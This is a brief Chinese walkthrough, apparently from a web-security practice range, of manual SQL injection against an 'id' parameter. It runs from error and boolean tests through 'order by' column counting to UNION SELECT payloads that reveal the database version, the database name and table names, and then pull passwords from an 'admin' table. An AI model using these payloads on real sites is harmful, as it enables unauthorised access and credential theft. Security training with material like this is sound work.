我们进入后发现,网址为: http://120.203.13.75:6815/index.php?id=1 。
作为学过web安全的我们,看到id回想到什么,首先想到的肯定是sql注入了。我首先加了个单引号进行测试,返回的页面是如下:
发现报错了,那我再换个语句进行测试,在后面输入,and 1=1,发现返回的页面是这样
然后再输入;and 1=2,返回的是
到了这里基本就可以判断是存在注入了。
我们首先使用order by 猜注入点 ,先是order by 10
发现报错,然后使用二分法,一直到order by 2时,返回的页面为这个:
那么基本确定注入点为2.
查出有多少个字段
接下来查一下数据库版本,and 1=2 UNION SELECT 1,version()
确定数据库版本为mysql 5.5.53
and 1=2 UNION SELECT 1,database()爆出数据库名
因为这是个mysql数据库,且版本为5.5.53,所以接下来查询表名:
and 1=2 UNION SELECT 1,table_name from information_schema.tables where table_schema=database()
查询密码 and 1=2 UNION SELECT 1,password from admin